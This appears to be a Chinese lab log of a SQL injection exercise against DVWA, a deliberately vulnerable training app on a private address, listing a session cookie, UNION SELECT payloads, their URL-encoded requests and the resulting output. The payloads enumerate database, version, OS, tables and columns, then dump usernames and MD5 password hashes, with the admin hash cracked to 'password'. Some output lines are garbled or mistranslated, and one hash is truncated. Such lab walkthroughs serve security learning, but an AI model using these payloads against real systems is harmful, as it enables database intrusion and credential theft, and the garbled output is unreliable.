security=high;PHPSESSID=i3e64cdvqbeq2ekvpccaeumo11
HackBar 网页调试插件
http://10.1.4.30/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#
1' union select database(),user()#
------------
http://10.1.4.30/vulnerabilities/sqli/?id=1%27+union+select+database%28%29%2Cuser
%28%29%23&Submit=%E6%8F%90%E4%BA%A4#
------------
ID:1'union select database(),user()#
名字:admin
姓氏:admin
ID:
1'union select database(),user()#
名字:dvwa
姓氏:root @ localhost
-------------------------------------------------------------------------------------
-1' union select database(),user()#
------------
http://10.1.4.30/vulnerabilities/sqli/?id=-1%27+union+select+database%28%29%2Cuser
%28%29%23&Submit=%E6%8F%90%E4%BA%A4#
------------
ID:
-1'union select database(),user()#名字:dvwa
姓氏:root @ localhost
---------------------------------------------------------------------------------------
-1' union select version(),@@version_compile_os#
------------
http://10.1.4.30/vulnerabilities/sqli/?id=-1%27+union+select+version%28%29%2C
%40%40version_compile_os%23&Submit=%E6%8F%90%E4%BA%A4#
------------
version() 获取当前数据库版本,@@version_compile_os获取当前操作系统
ID:-1'union select version(),@@ version_compile_os#
名字:5.5.48-log
姓氏:Linux
---------------------------------------------------------------------------------------
-1' union select table_name,2 from information_schema.tables where table_schema= 'dvwa'#
ID:-1'union select table_name,2 from information_schema.tables where table_schema
='dvwa'#
名:guestbook
姓氏:2
ID:-1'union select table_name,2 from information_schema.tables where table_schema
='dvwa'#
名字:users
姓氏:2
爆出来两个表
------------------------------------------------------------------------------------------
-1' union select column_name,2 from information_schema.columns where table_schema= 'dvwa' and table_name= 'users'#
ID:-1'union select column_name,2 from information_schema.columns where table_schema
='dvwa' and table_name ='users'#
名字:user_id
姓氏:2
ID:-1'union select column_name,2 from information_schema.columns where table_schema
='dvwa'and table_name ='users'#
名:first_name
姓氏:2
ID:-1'union select column_name,2 from information_schema.columns where table_schema
='dvwa'and table_name ='users'#
名字:last_name
姓氏:2
ID:-1'union select column_name,2 from information_schema.columns where table_schema
='dvwa'and table_name ='users'#
名:user
Surname:2
ID:-1'union select column_name,2 from information_schema.columns where table_schema
='dvwa'and table_name ='users'#
名字:password
姓氏:2
ID:-1'union select column_name,2 from information_schema.columns where table_schema
='dvwa'and table_name ='users'#
名:avatar
姓:2
----------------------------------------------------------------------------
-1' union select user,password from users#
爆破user,password表数据
ID :-1'union select user,用户密码#
名:admin
姓氏:5f4dcc3b5aa765d61d8327deb882cf99
ID:
-1'union select user,
用户密码#名:gordonb
姓:e99a18c428cb38d5f260853678922e03
ID :-1'union select user,用户密码#
名:1337
姓:8d3533d75ae2c3966d7e0d4fcc69216b
ID :-1'union select user,用户密码#
名:pablo
姓:0d107d09f5bbe40cade3de5c71e9e9b7
ID :-1'union select user,用户密码#
名
:smithy姓:5f4dcc3b5aa765d61d8327deb882cf9
admin密码通过MD5解密得到字符串是“5f4dcc3b5aa765d61d8327deb882cf99”,解密的结果
为“password”!
-----------------------------------------------------------------------------------